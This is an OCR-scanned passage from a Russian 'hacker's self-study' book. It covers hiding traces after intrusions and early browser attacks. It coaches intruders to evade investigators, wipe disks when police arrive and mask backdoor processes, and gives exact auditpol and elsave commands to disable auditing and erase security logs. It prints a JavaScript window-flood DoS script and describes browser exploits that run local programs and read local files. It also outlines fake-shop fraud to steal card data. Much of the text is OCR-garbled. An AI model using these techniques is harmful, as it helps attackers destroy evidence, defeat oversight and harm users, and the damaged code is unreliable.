Puc. 4.2. Папка со скрытыми файлами,
оставшимися после удаления основного файла документа
Как видим, после удаления файла в папке осталось несколько его копий — временные файлы .ТМР, резервные копии .WBK, оставшийся после зависания ком60

Сокрытие следов
пьютера файл, начинающийся с символов ~$. Более того, если все эти файлы
также удалить, в том числе, и из корзины Windows, фрагменты информации,
содержащиеся в документе, все равно останутся в файле подкачки системы
Windows. Вам, наверное стало ясно — что ничего вы, в сущности, не удалили все ваши делишки налицо. Что же теперь делать?
Для надежного удаления всей информации, относящейся к файлу документа MS Office, следует применять специальные утилиты очистки дисков,
предоставляемые многими приложениями, например, Norton Utilities. Мы
же рассмотрим сейчас более эффективное средство очистки дисков от всякого компрометирующего мусора — программу Cleaner Disk Security
(http://www.theabsolute.net/sware/index.htmlttClndisk).

Очистка файлов и папок
Чтобы стереть файл так, чтобы его не смогла прочитать программа восстановления
файлов, следует физически перезаписать все биты файла, хранящиеся на диске. Однако это не так просто, как может показаться на первый взгляд. Для надежной очистки носитель секретной информации должен перезаписываться многократно, с
использованием шаблонных байтов информации, генерируемых случайным образом. Число итераций зависит от важности информации и типа ее носителя — стандарт министерства обороны США, например, требует трехкратной перезаписи.
Только это может гарантировать высокую (но не 100%) степень очистки.
На Рис. 4.3 представлен диалог утилиты Clean Disk Security 5.01
(http://www.the-absolute.net/sware/
index.html#Clndisk), которая удовлетворяет основным требованиям,
предъявляемым к средствам очистки
носителей секретной информации
(и даже несколько их усиливает).
Утилита Clean Disk Security 5.01
позволяет стирать отдельные файлы и папки на дисках с помощью
команды контекстного меню Erase
fully (Полное стирание). Утилита
обеспечивает полное стирание уничтожается как сама информация
в файлах, так и все ее следы, ос- Рис. 4.3. Утилита Clean Disk Security 5.01
тавшиеся в различных буферах и
выполняет очистку дисков
таблице размещения файловой сисчетырьмя методами
темы (поддерживаются файловые
61

Самоучитель хакера
системы FAT и NTFS). Также стирается информация, содержащаяся в свободных областях кластеров файловой системы, используемых стираемым файлом.
Утилита позволяет очищать файл подкачки Windows, корзину Windows, папку
Temp с временными файлами (в которую, например, загружаются распаковываемые инсталляционные файлы) и очищать списки последних использованных
файлов. При желании пользователь может очистить кэш-память, используемую
браузерами Интернета для хранения загруженных файлов, списки, хранящие
предысторию работы в Интернете и файлы куки (cookie). Все эти возможности
устанавливаются с помощью флажков, представленных в главном диалоге утилиты (Рис. 4.3).
Как видно на Рис. 4.3, утилита предоставляет четыре метода очистки:
• Simple (Простой) — допускает выполнение до 6 проходов, во время которых
на диск записываются случайно генерируемые символы. Этот метод пригоден для большинства случаев; обычно бывает достаточно 1 прохода.
• NIS — поддерживает до 7 проходов с записью случайно генерируемых символов (т.е. наборов бит определенной длины) и их преобразований.
• Gutmann — поддерживает до 35 проходов с записью случайно генерируемых
шаблонов (т.е. последовательностей случайно генерируемых бит). Этот метод
предложен Питером Гутманом (Peter Gutmann) из департамента компьютерных наук университета г. Окленд. Полная очистка этим методом занимает много времени, но зато обеспечивает защиту от сканирования диска высокоточным
оборудованием (есть и такое).
• Test mode (Тестовый режим) — выполняет за один проход запись символа #10
кода ASCII.
Все эти возможности впечатляют. Очевидно, что утилита Clean Disk Security 5.01
представляет собой профессиональный инструмент для стирания информации
и, к тому же, снабженный удобным интерфейсом и исчерпывающей справочной системой.
Вот вам совет, почерпнутый из [10]. Чтобы по-настоящему надежно прикрыться
от всяких следопытов, сделайте следующее: купите себе источник бесперебойного питания (UPS); подготовьте надежную утилиту полной очистки жесткого
диска компьютера. Далее, как только к вам придут нежданные гости, запустите
утилиту очистки и дождитесь завершения ее работы. Источник бесперебойного
питания поможет вам довести операцию до конца, если ваши гости выключат
электропитание в вашей квартире.

62

Сокрытие следов

Очистка системного реестра
Наконец, упомянем угрозу, исходящую от системного реестра. В нем хранится
очень и очень много всего такого, что выдаст вас с головой, стоит только там
покопаться квалифицированному специалисту. Вообще-то, именно по этой причине системный реестр пользуется повышенным вниманием хакера, но в данном
случае мы имеем в виду внимание людей, интересующихся самими хакерами.
Так что не стоит пренебрегать его очисткой от порочащих вас данных, хотя сделать это достаточно сложно. Дело в том, что автоматизированные утилиты очистки реестра, к примеру, Norton Utilities, обеспечивают удаление только ненужных записей, оставшихся после установки/удаления программ, создания и удаления ярлыков и так далее. Избирательно очищать реестр от конфиденциальных
данных они не умеют, и все это следует делать руками, в лучшем случае с помощью самодельных сценариев [10].
Так что лучший выход (исключая полную очистку системы) —

это закрытие доступа к реестру для всех, кроме администратора системы, что можно сделать
средствами редактора реестра regedt32. Далее следует рассмотреть вопрос об
использовании криптографических средств для защиты хакерской системы от
нежелательного просмотра любителями чужих секретов. Например, можно прибегнуть к средствам шифрования файлов и папок, предоставляемым файловой
системой NTFS.

Глобальная безопасность
В начале главы уже отмечалось, что главная опасность, которая подстерегает
хакера, проводящего различные акции в Интернете — это ложное ощущение
своей анонимности и неуязвимости. Следует твердо помнить, что все — абсолютно все — действия в Интернете отслеживаются Web-серверами и фиксируются в специальных журналах. Далее эти сведения могут быть предоставлены
кому угодно, в том числе и людям, потерпевшим от ваших действий. Поэтому
при работе в Интернете следует соблюдать особую осторожность. Обсудим
самые опасные ситуации, подстерегающие пользователя, подсоединившегося к
Интернету.

ТТро&айдеры
При подключении к Интернету, прежде всего, следует позаботиться об анонимности подключения к серверу провайдера Интернета. Так что при выборе провайдера Интернета прежде всего постарайтесь избежать авторизованного доступа к Интернету и вместо заключения договора отдайте предпочтение покупке
карточки Интернета. Такие карточки ныне общедоступны, и при их покупке вы
сохраняете свою анонимность.

63

Самоучитель хакера
Однако анонимность покупки карточки вовсе не означает вашей анонимности
при работе в Интернете, что напрямую связано с конфиденциальностью и безопасностью вашей информации. В настоящее время провайдеры Интернета устанавливают на входных телефонных линиях своего сервера устройства автоматического определения номера (АОН). При подключении к серверу провайдера
Интернета местная АТС, в ответ на запрос сервера, отсылает ему телефонный
номер входящего звонка, и сервер записывает этот номер в журнал вместе с вашей учетной записью. В процессе работы в Интернете сервер провайдера будет
автоматически фиксировать все ваши действия (адреса посещенных Web-узлов,
использованные протоколы, возможно, фрагменты трафика), ассоциируя их с
вашей учетной записью, хранящей, в том числе, выявленный устройством АОН
номер вашего телефона. Так что, в случае необходимости, найти вас не представляет никакого труда.
Для борьбы с этим злом предлагается множество методов (см., к примеру [5],
[10], или выпуски журнала «Хакер» — автор бессилен передать все многообразие
методов и уловок, которые можно встретить на страницах этого, в высшей степени полезного источника). Скажем, предлагается устанавливать на своем компьютере устройство анти-АОН, которое призвано блокировать передачу станцией
АТС вашего телефонного номера серверу провайдера Интернета. Однако надежность защиты, обеспечиваемой этими устройствами, никем толком не проверена, поскольку все они разработаны и изготовлены радиолюбителями. Так что
вряд ли стоит полагаться на эффективность таких устройств, как анти-АОН.
Если уж вы решитесь на использование анти-АОН, программных или аппаратных, для начала проверьте их эффективность. Многие провайдеры Интернета
предоставляют своим пользователям статистику подключений по пользовательской учетной записи. Это делается для контроля пользователями расходов бюджета, выявления нелегальных подключений и так далее. Так вот, в этой статистике приводятся телефоны, с которых выполнялись подключения, выявленные
устройствами АОН провайдера. Так что включите свой анти-АОН, выполните
несколько подключений к Интернету и проверьте — что из этого получилось,
прежде чем пускаться во все тяжкие!
Общая рекомендация такова — если вы хотите сделать в Интернете нечто, требующее полной конфиденциальности, никогда и ни при каких обстоятельствах
не используйте телефон, номер которого позволит выявить вашу личность. И уж
во всяком случае, НИКОГДА НЕ ИСПОЛЬЗУЙТЕ ДОМАШНИЙ ТЕЛЕФОН ЭТО АБСОЛЮТНО, БЕЗУСЛОВНО И СОВЕРШЕННО НЕДОПУСТИМО!!!

Анонимайзеры
При запросе страницы Web-сайта компьютеру приходится обмениваться с сервером определенной информацией, и этот процесс не ограничивается передачей
64

Сокрытие следов
.вам для просмотра HTML-кода запрошенной Web-страницы. В процессе обмена
сервер может получить с компьютера Web-путешественника и другую информацию, в том числе идентифицирующую тип компьютера, предыдущий посещенный вами Web-сайт, идентифицирующие вас адреса электронной почты и
тому подобное.
Чтобы более четко уяснить возможности по вашей идентификации, имеющиеся
у серверов Интернета, можно обратиться к Web-сайту по адресу
http://www.privacy.net/analyze, который предоставляет услуги по анализу информации, которую может извлечь Web-сервер из клиентского компьютера.
Как видно из Рис. 4.4, этот сервер Интернета без проблем определил операционную систему клиентского компьютера, используемый Web-браузер, время запроса и ГР-адрес сервера провайдера Интернета.
3l Analyze Your Internet Privacy — Microsoft Internet Explorer
Файл

^^^^»

^^^^~

Правка Вид Избранное

•BBSBBBgg

Сервис Справка

а

**- Назад ^

Переход
Your Browser Type and Operating System:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All Information sent by your web browser when requesting this web page:
Accept: */* Accept-Language: ru Connection; keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:
Date=1/30/2002; Privacy. net=Privacy+Analysis Via: 1.1 cea15. 1.1
proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3) X-Forwarded-For: 212.9.232.151,
212.9.224.89 Cache-Control: max-age=259200

a_

Интернет

Рис. 4.4. Фрагмент Web-страницы с результатом анализа конфиденциальности
Более того, на этой же странице чуть ниже (здесь это не видно) представлены
результаты запроса одного из серверов Whols, о которых мы рассказывали в
Главе 1, содержащие регистрационные сведения о домене провайдера Интернета
вместе с телефонами администраторов сети.
Ясно, что обладание такой информацией выдает ваше местоположение с головой — для этого нужно только просмотреть на сервере удаленного доступа провайдера все регистрационные журналы и найти запись, фиксирующую информацию о подключении клиентского компьютера с данным IP-адресом в указанное время и с указанного телефона. Так что недаром ныне многие Web-сайты на
загруженной Web-странице отображают предупреждение о том, что серверу известен IP-адрес клиентского компьютера — и в случае несанкционированных
действий последствия гарантированы…

65
3 — 5830

Самоучитель хакера

Чтобы избежать такого развития событий, следует обратиться к сервисам, предоставляемым некоторыми Web-узлами, которые на компьютерном сленге называются «анонимайзерами» (от английского слова «anonymizer» — средство
сохранения анонимности). Анонимайзер представляет собой службупосредник, исполняемую на Web-сервере, с помощью которой пользователь
может путешествовать по Сети согласно командам, отдаваемым с браузера
своего компьютера. Такую услугу предоставляет, например, анонимайзер по
адресу http://www.anonymizer.com. (Рис. 4.5).
Anonymizer.com — Onlinu Privacy Sorvic
4-Назад — •» — О и 1Й | ОПоиск СВ Избранное U»Журнал [ ife-r ^ И » В
Адрас Цй hup.//wwwanonymteBf.coin.

Anonymizer.com
Мии(| AboutPrivacy’

FIND IT • STO

S

spyCap
«•••• •»’•«»

:

Рис. 4.5. Для анонимного посещения Web-сайта
просто введите в строку его адрес и щелкните на кнопке Go.
Все последующие ссылки будут направляться от лица анонимайзера
Анонимайзеры — эффективное средство для обеспечения анонимности, но они
не лишены недостатков — не все анонимайзеры разрешают FTP-доступ, и многие, в качестве дополнительной «нагрузки», заставляют некоторое время просматривать свои рекламные объявления. Кроме того, учтите, что анонимайзеры,
как и все Web-серверы, также ведут регистрационные журналы, фиксирующие
своих посетителей. И если для обычных граждан эти журналы недоступны
(в этом и состоит суть услуг анонимайзеров), то для необычных граждан в принципе нет ничего невозможного.

Сделать свои путешествия по Web анонимными можно также с помощью прокси-серверов, указывая их параметры в разделе Прокси-сервер (Proxy server)
диалога настройки удаленного подключения (Рис. 4.6).

66

Сокрытие следов
-Автоматическая настройка

‘»
Использование автоматической настроит может изменить установленные
вручную параметры. Для использования ручной настройки отключите
автоматическую настройку,
D Автоматическое определение настроек
Q Использовать сценарий автоматической настройки
Адрес
0 Использовать прокси-сервер
Адрес:

|www.anonymize| Порт; J8080

[дополнительно…!

D Не использовать прокси-сервер для локальных адресов
-Настройка удаленное
Имя пользователя:
Пароль:
Домен:

1
1
1

Свойства
|

Настройка

П Не использовать это соединение в программах Интернета

Рис. 4.6. Указание адреса прокси-сервера в настройках удаленного доступа
Прокси-сервер работает, по сути, как анонимайзер, т.е. при запросах Web-сайтов
на серверах будет регистрироваться адрес прокси-сервера, но есть и некоторые
отличия.
• Прокси-сервер не отменяет использование файлов куки.
• Прокси-сервер позволяет работать как с HTTP, так и с FTP-серверами, что
дает возможность сделать анонимными не только посещения Web-сайтов, но
также и загрузку файлов по протоколу FTP.
• Если использовать адрес прокси-сервера своего провайдера Интернета, угроза идентификации вашего компьютера остается.
• В любом случае прокси-сервер не защитит вас от следопытов со специфическими возможностями.
Для преодоления последнего недостатка можно воспользоваться услугами прокси-сервера постороннего провайдера. Его можно найти, например, с помощью
поисковых машин, предоставляемых различными Web-сайтами, скажем, Yahoo.
Наберите в строке поиска proxy+server+configuration+Explorer, и в ответ вы
получите множество Web-страниц, принадлежащих провайдерам Интернета, с
описанием способов настройки их прокси-серверов. Затем попробуйте настроить
на эти прокси-серверы свое удаленное соединение с провайдером Интернета и,
как правило, после нескольких попыток у вас это получится.

67

Самоучитель хакера

Сокрытие следов атаки
Итак, вы уже усвоили, что, подобно обычному грабителю, никакой настоящий
хакер, побывав в чужом компьютере, не захочет оставить после себя следы, которые могут привлечь к нему внимание. Перед уходом из системы он создаст в
ней потайные ходы, поместив в систему клавиатурного шпиона, например, описанного в Главе 3 кейлоггера IKS. Или же установит в компьютер утилиту удаленного администрирования взломанной системы, например, трояна NetBus
(http://www.netBus.org). Но после всего этого хакеру потребуется уничтожить
все следы своего пребывания в системе или, как минимум, сделать так, чтобы
информация о его посещении, зарегистрированная системой защиты, не позволила определить его личность.
Вот какие методы чаще всего используются взломщиками для сохранения анонимности и скрытия следов атаки:
• Самое лучшее — это использовать для хакинга в Интернете посторонние компьютеры, доступ к которым не контролируется в должной степени (а таких
компьютеров в любой организации — хоть пруд пруди).
• Можно подменить IP-адрес хакерского компьютера, использовав промежуточный анонимайзер или прокси-сервер, как мы уже обсуждали это выше
в этой главе.
• Чтобы скрыть установленные на взломанном компьютере хакерские программы, можно изменить стандартные номера портов этих программ, что затрудняет их выявление. Например, широко известная программа Back Orifice 2000
вместо стандартного порта 31337 может быть перенастроена на использование, скажем, порта 31336, и программы, анализирующие открытые порты компьютера, могут быть введены в заблуждение.
• Обязательно следует очистить журналы регистрации событий безопасности,
которые заполняются средствами аудита систем Windows NT/2000/XP. Чтобы
отключить средства аудита, взломщик может прибегнуть к утилите auditpol
пакета W2RK, или какой-нибудь другой хакерской утилите, например, elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). Проще всего это
можно сделать с помощью аплета Просмотр событий (Event Viewer) на панели управления Windows 2000/XP.
• Можно скрыть файлы и папки, скопированные во взломанный компьютер,
установив в диалоге свойств файлов и папок флажок Скрытый (Hidden).
Установка этого атрибута делает файл или папку невидимой в окне проводника
Windows, если только не был установлен режим отображения скрытых файлов.
• Можно скрыть процессы, исполняемые хакерскими программами. Хакер
может замаскировать запущенную им службу или программу, изменив ее
68

Сокрытие следов
имя на совершенно нейтральное, например, explorer.exe, которое в окне
диспетчера задач Windows можно будет спутать с обычным приложением
проводника Windows.
• Более сложным являются случаи скрытия процессов хакерских программ за
именами других процессов с помощью программ, подобных EliteWrap, описанной в [11].
• Наиболее совершенным методом скрытия хакерских программ следует считать
использование так называемых руткитов (от английского слова Rootkit — базовый комплект инструментов). При этом подлинные программы ядра операционной системы подменяются хакерскими утилитами, выполняющими функции
входной регистрации пользователей, ведения журнала нажатых клавиш и пересылки собранных данных по сети.
Для противостояния таким трюкам существуют специальные программные
средства контроля целостности компьютерной информации. В качестве примера
можно назвать приложение Tripwire (http://www.tripwiresecurity.com), которое
позволяет выполнять контроль целостности файлов и папок, и приложение Cisco
Systems (http://www.cisco.com) для проверки и анализа содержимого журналов
регистрации. Системы Windows 2000/XP также предоставляют встроенный инструмент проверки целостности файлов, про работу с которыми можно узнать,
например, в [7].

Отключение аудита
Аудит, несомненно, является одним из наиболее серьезных средств защиты от
хакинга компьютерной системы, и отключение средств аудита — одна из первых
операций, которую выполняют хакеры при взломе компьютерной системы. Для
этого применяются различные утилиты, позволяющие очистить журнал регистрации и/или отключить аудит системы перед началом «работы».
Для отключения аудита хакеры могут отключить политику аудита штатными
средствами настройки системы защиты Windows NT/2000/XP, однако лучше прибегнуть к более мощному средству, предоставляемому утилитой auditpol.exe из
комплекта инструментов W2RK. С ее помощью можно отключать (и включать)
аудит как локального, так и удаленного компьютера. Для этого следует из командной строки ввести такую команду:

C:\Auditpol>auditpol \\ComputerName /disable
Running…
Audit information changed successfully on \\ComputerName …
New audit policy on \\ComputerName …
(0) Audit Disabled

69

Самоучитель хакера
System
Logon
Object Access
Privilege Use
Process Tracking
Policy Change
Account Management
Directory Service Access
Account Logon

= No
= No
= No
= No
= Success and Failure
= No
= No
= No
= No

Здесь //ComputerName — имя удаленного компьютера, а ключ /disable задает
отключение аудита на этом компьютере. Утилита auditpol.exe — весьма эффективное средство, созданное для управления сетевыми ресурсами, но также, как
видим, весьма удобный инструмент хакинга (ввод команды auditpol /? отображает справочную информацию о применении утилиты).

Очистка журналов безопасности
Для очистки журнала безопасности с помощью специального аплета на панели
управления Windows 2000/XP следует выполнить следующие действия:
> Щелкните на кнопке Пуск (Start) и в появившемся главном меню выберите
команду Настройка ••Панель управления (Settings • Control Panel).
File

Action

View

Help

Event Viewer [Local]
I Type I Description
Application Error Record!

I Sire
512…

Delete all records n the log

Puc. 4.7. Очистка журнала событий безопасности средствами Windows
70

Сокрытие следов
В отобразившейся Панели управления (Control Panel) откройте папку
Администрирование (Administrative Tools).
Дважды щелкните на аплете Просмотр событий (Event Viewer). На экране
появится окно Event Viewer (Просмотр событий) (Рис. 4.7).
Щелкните правой кнопкой мыши на пункте Безопасность (Security Log);
появится контекстное меню.
Выберите команду Clear all Events (Стереть все события). Отобразится диалог, представленный на Рис. 4.8, с предложением сохранить журнальные
события в файле.

Do you want lo save «Security» before clearing it?
Yet

No

Cancel

Puc. 4.8. Запрос о необходимости сохранения журнала безопасности
> Щелкните на кнопке Нет (No), если вам больше не требуются зафиксированные в журнале события. Журнал будет очищен.
При выполнении очистки журнала безопасности обратите внимание на тот факт,
что после выполнения этой операции в журнал сразу же записывается новое событие аудита — только что выполненная операция очистки! Таким образом, хакер все
же оставит свой след — пустой журнал с зафиксированным событием очистки
журнала. Этот недостаток можно исправить, применив для очистки журнала хакерскую утилиту elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
Эта утилита предназначена, в первую очередь, для очистки журналов
Windows NT 4, но ее последняя версия работает и с системой Windows 2000.
Вот как она запускается из командной строки.
C:\els004>elsave -s \\ComputerName -С
Здесь ключ -s задает режим удаленной очистки, а ключ -С задает операцию
очистки журнала. Кроме очистки, утилита позволяет копировать события журнала в файл. Ввод команды elsave /? приводит к отображению справки, и вы
можете сами испытать эффективность всех предлагаемых возможностей.
Элементарная проверка показывает, что отмеченный выше недостаток остался применение утилиты elsave.exe регистрируется в журнале безопасности как событие очистки журнала. Однако теперь мы можем сделать следующий трюк — поместить задание на очистку журнала утилитой elsave.exe в планировщик заданий
Windows (запустив его или из меню Пуск (Start), либо командой AT из командной
строки MS-DOS). Планировщик выполнит операцию очистки под учетной записью System, что сильно затруднит поиски хакера.
71

Самоучитель хакера

Заключение
Сокрытие следов своей работы на компьютере и сохранение своей конфиденциальности в Интернете — это непременное условие для успешной деятельности
хакера без особых помех (по крайней мере, какое-то время). Так что не стоит
пренебрегать мерами своей защиты, по крайней мере, до приобретения некоторого опыта. Как показано в этой главе, обеспечение своей безопасности и конфиденциальности вовсе не так сложно, если твердо, раз и навсегда преодолеть
ложное ощущение своей анонимности и недосягаемости во время пребывания в
виртуальном киберпространстве, особенно на чужой территории. И перестаньте
пользоваться домашними телефонами — не ройте яму самому себе! Ведь 50%
(вдумайтесь — половина!) всех так называемых «хакеров» лезут в чужой огород с
домашнего телефона — большего идиотизма трудно себе представить!
Для антихакера все эти соображения также имеют самое непосредственное значение — пребывая в киберпространстве, очень просто вступить в конфликт с чужими интересами или с путаными и туманными законами разных стран, или попасть под пристальное внимание личностей самого разного рода занятий и наклонностей [9]. Ведь недаром ныне на рынке программных продуктов все активнее предлагаются программы для защиты компьютерной конфиденциальности, например, Norton Personal Firewall, PGP Desktop Security и другие. Не стоит
ими пренебрегать, если вы хотите комфортно чувствовать себя во время пребывания в виртуальном компьютерном мире, который ныне все больше и больше
пересекается с нашим реальным, физически ощутимым миром.

72

ГЛАВА 5

Хакинг #рауз
До сих пор, расписывая деяния хакеров в виртуальном компьютерном мире, мы
ограничивались автономным компьютером, предполагая, что у хакера имеется
локальный доступ к консоли компьютерной системы. Однако, как вы сами понимаете, огромный виртуальный мир Интернета никак не может быть оставлен
без внимания хакеров, поскольку в этом мире имеется очень много полезных
ресурсов и личностей, готовых с ними расстаться, причем безвозмездно.
Более того, именно после возникновения в середине 90-х годов прошлого столетия общедоступной сети Интернет, хакинг приобрел настоящую силу и мощь.
Путешествуя по серверам Интернета, хакер может с помощью своего компьютера проникать во все уголки этого пространства, преследуя при этом свои цели.
Далее в этой книги мы займемся обсуждением этих возможностей, а сейчас сделаем несколько замечаний, уточняющих терминологию, используемую далее
при описании средств хакинга в Интернете.
Итак, Интернет представляет собой объединение множества сетей, состоящих из
серверов и клиентов, взаимодействующих согласно стеку протоколов TCP/IP.
• Клиенты — это прикладные программы, предназначенные для установления
соединения с компьютерами сети с целью получения нужной информации.
• Серверы — это прикладные программы, которые предназначены для установления связи с клиентами, получения от клиентов запросов и отправки ответов.
Обычно серверы функционируют на мощных компьютерах, соединенных друг с
другом магистральными линиями связи с большой пропускной способностью.
Клиенты функционируют, как правило, на сравнительно менее мощных компьютерах, подсоединенных к серверам с помощью значительно менее быстродействующих линий связи (например, телефонных линий).
Серверы управляют доступом к информационным ресурсам Интернета, руководствуясь запросами клиентов. Этими ресурсами может быть любой объект,
содержащий информацию, например, файл базы данных, документ Word и т.д.,
или любая служба, позволяющая, например, звонить по телефону или выполнять
финансовые операции через Интернет.
Основные ресурсы Интернета содержатся в сети WWW (World Wide Web — Всемирная паутина), или просто Web (Паутина). Сеть Web — это одно из прикладных применений сети Интернет, хотя очень многие люди считают термины
Интернет и Web синонимами. Однако это не так — если возникновение сети
Интернет можно отнести к 1961 году, то сеть Web возникла в 1992 году и ее развитие связано с появлением гипертекстовых информационных систем.
Гипертекстовые информационные системы отличаются тем, что позволяют обращаться к хранимому в них гипертексту в произвольном порядке, определяв-

Самоучитель хакера
мом гиперссылками. Именно так и организована сеть Web — множество страничек Web представляет собой гипертекст, содержащий множество гиперссылок
на информационные ресурсы, хранимые на серверах сети Web.
Сеть Web функционирует с опорой на следующие технические средства.
• Единую систему наименований ресурсов Web, делающую возможным их поиск по серверам Web и основанную на так называемых адресах URL (Uniform
Resource Locator — Унифицированный указатель информационного ресурса),
определяемых протоколом доступа к серверам Web.
• Протокол организации сетевого доступа к именованным сетевым ресурсам, в
качестве которого в Web выступает протокол HTTP (Hyper Text Transfer
Protocol — Протокол передачи гипертекстовых файлов).
• Гипертекст, облегчающий навигацию по ресурсам Web, для создания которых используется язык HTML (Hyper Text Markup Language — Язык разметки
гипертекста).
Чтобы облегчить вам знакомство с этими средствами, обратитесь к литературе,
перечисленной в конце книги, в которой обсуждаются основные средства и протоколы Интернета — язык HTML и протоколы CGI и HTTP.
Все указанные средства Web интересны для хакеров прежде всего тем, что недостатки системы защиты серверов и клиентов, обслуживающих функционирование Web, позволяют им выполнять некоторые весьма интересные трюки, результатом которых может быть что угодно — потеря денег на счетах, утрата работоспособности компьютера, раскрытие конфиденциальности разного рода документов — в Главе 1 мы привели несколько сообщений из Web о последних
«достижениях» в этой области.
Рассмотрим некоторые из приемов хакинга в Web и начнем, естественно, с основы основ сети Web — языка HTML и клиентов Web, называемых браузерами
(от английского слова browser, дословно означающего «человек, перелистывающий книги» или «животное, объедающее побеги»), которые отображают
пользователям Web содержимое Web-страниц.

Злонамеренный код ИТМР
Язык HTML — это средство создания страниц Web, основная функция которого
состоит в форматировании текстового содержимого страницы Web, вставки в
текст графики, мультимедийной информации, например, звука, различных интерактивных элементов, таких как списки, кнопки и, наконец, сценариев. Таким образом, с помощью языка HTML обычный текстовый документ можно превратить
в настоящую программу, которая исполняется браузерами Web, чаще всего, Internet Explorer (ffi) и Netscape Navigator (NN).
74

Хакинг браузеров Web
Хакер рассуждает таким образом: раз страничка Web — это программа, то почему бы не заставить код HTML странички Web делать то, что нужно мне, а не то,
для чего язык HTML, собственно, предназначен — воспроизведения информационных ресурсов на серверах Web? Тогда первый вопрос — что может сделать
этот код HTML? Небольшие исследования в этом направлении показывают что очень многое. Ниже перечислены некоторые (далеко не все) из хакерских
штучек, которые могут заставить поволноваться пользователя, путешествующего по Интернету с помощью Web-браузера.

Генерация диалогов
По сути, это атака DoS на компьютер клиента Интернета, выполняемая включением в страничку Web простейших сценариев. Эти сценарии могут, скажем,
бесконечно генерировать все новые и новые странички Web, которые браузер
будет отображать на экране, пока не переполнит память компьютера.
Проще всего эту атаку можно выполнить с помощью команды open ( ) , которая в
бесконечном цикле сценария JavaScript в страничке MainPage.html отображает эту
же страничку до переполнения памяти, как это сделано в коде HTML Листинга 8. 1.
Листинг 8.1.
Код HTML для бесконечного генерирования диалогов Web-странички

< SCRIPT LANGUAGE* » JavaScript » >
generation () ;
function generation () {
var d=0;
while (true) {
a = new Date;
d = a.getMilliseconds( ) ;
window. open («MainPage. html», d, «width=250, height =250») ;

Если вы решите повторить этот и последующие эксперименты с
кодом HTML, то предварительно закройте все приложения и запустите диспетчера задач, чтобы вовремя прекратить открытие все новых и новых диалогов. Хотя системы Windows 2000/XP
с браузерами IE 5 и IE 6 устойчивы к ошибкам в кодах HTML, лучше
подстраховаться .

75

Самоучитель хакера
Воспроизведение такого кода браузерами IE 5 и IE 6 приведет к стопроцентной
загрузке процессора и заполнению экрана пустыми диалогами.

tlepеполиеиие памяти
В других злонамеренных сценариях выполняют еще более простой трюк — записывают переменную с очень длинным идентификатором. Например, в Листинге 8.2
идентификатор хххххх… ххххх содержит несколько тысяч символов х (здесь
они не воспроизведены для экономии места).
Листинг 8.2.
Код HTML переполнения памяти в сценарии Web-страницы

var p = external.ХХХХХХ… ХХХХХ;

Результатом воспроизведения кода HTML из листинга 8.2 браузером IE версий 5
и 6 будет отображение сообщения об ошибке в строке оператора декларирования переменной var p из Листинга 8.2.
Список подобного рода «сценариев» и проделываемых с их помощью «трюков»
воистину безграничен (примеры можно найти в [3], [10]). Мы, однако, не будем
на них останавливаться и рассмотрим более сложный пример — запуск из кода
HTML программ на клиентском компьютере.

ск программ
В [3] описан метод запуска любых локальных программ с помощью кода HTML,
содержащего тег с ненулевым значением идентификатора CLSID.
В листинге 8.3.представлен код HTML, реализующий указанную возможность.
Листинг 8.3.
Запуск локальных программ из кода HTML

При загрузке кода из листинга 8.3 в браузер IE 6 отображается окно браузера,
представленное на Рис. 5.1.

76

Хакинг браузеров Web
JQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D… [Г)Б1Гх1

Рис. 5.1. Запуск программы калькулятора из кода HTML
В данном случае была запущена программа Калькулятор из папки C:\Windows\
system32\calc.exe, однако ничего не мешает злоумышленнику запустить подобным образом программу форматирования дисков локального компьютера, расположенную в том же каталоге.

Система защиты Web-браузеров построена таким образом, чтобы сценарии
JavaScript, помещаемые в HTML-код Web-страниц, не имели доступа к локальной файловой системе компьютера. Однако и здесь имеется лазейка, связанная с
тегом IFRAME, предназначенном для внедрения в текст Web-страницы небольших фреймов.
В листинге 8.4 представлен код HTML, позволяющий сценарию прочесть файл,
хранящийся в корневом каталоге клиентского компьютера C:\security.txt.
Листинг 8.4.
Открытие
локальных

файлов

из

сценария

Web-странички _

Чтение файла C:\security.txt

alert («Ваш файл содержит такие сведения:
\n » +b . document . body . innerText ) ;

77

Самоучитель хакера
II.navigate(«file://с:/Security.txt»);
setTimeout(‘Il.navigate(nfile://C:/Security.txt»)’,1000);

Загрузка кода из Листинга 8.4 в браузерах IE 5 и IE 6 приводит к отображению окна браузера, представленного на Рис. 5.2.

File

Edit

View

Favorite*

Tools

Help

QMd.-0-й и

Чтение файла C:\security.txt

Как видно из Рис. 5.2, содержимое
Это очень большой секрет
файла security.txt — строка Это очень
большой секрет — отобразилось во
фрейме внутри Web-странички. Таким
образом, получив доступ к локальной
файловой системе, можно подумать и
о дальнейшей работе с ее ресурсами и учтите, что сценарии JavaScript позволяют выполнять отправку элекРис. 5.2. Сценарий Web-странички
тронных писем по указанному адресу.
сумел прочитать локальный файл
Данная уязвимость Web-браузеров
связана с ошибками в реализации события NavigateComplete2, которое сообщает о завершении перемещения документа на новое место [3].

Подмена Web-caumo&
Все описанные выше атаки могут сильно испортить нервы беспечного Webпутешественника, но, как правило, дело только этим и ограничивается — реальный вред с помощью загруженных с Web-страницей враждебных аплетов и сценариев нанести достаточно сложно. Подобные атаки практически не опасны, если
защита Web-браузера настроена на блокирование не сертифицированных элементов ActiveX, и не выполняет в автоматическом режиме загруженные сценарии.
Однако имеется другая разновидность хакинга, основанная исключительно на
мошенничестве, и ориентированная на извлечение финансовых средств у всех
тех личностей, которые, стремясь идти в ногу со временем, обзаводятся кредитными карточками, счетами в Интернет-банках, используя их для покупок
в Интернет-магазинах и т.д. При этом мало кто из счастливых обладателей
Интернет-карточек представляет, как работает механизм, обслуживающий их
покупки. Многие вообще не интересуются, как будут использоваться владельцами виртуального магазина переданные им совершенно конфиденциальные
данные — номер и другие платежные реквизиты кредитной карточки.
78

Хакинг браузеров Web
Все это — сущий клад для хакера, поскольку все что нужно сделать для обмана
покупателей — это создать Web-сайт, копирующий внешний вид электронного
магазина известной фирмы. Далее, распространив ссылки на этот сайт по всему
Интернету, хакер может без проблем продавать виртуальный воздух и снимать
деньги со счетов доверчивых посетителей.
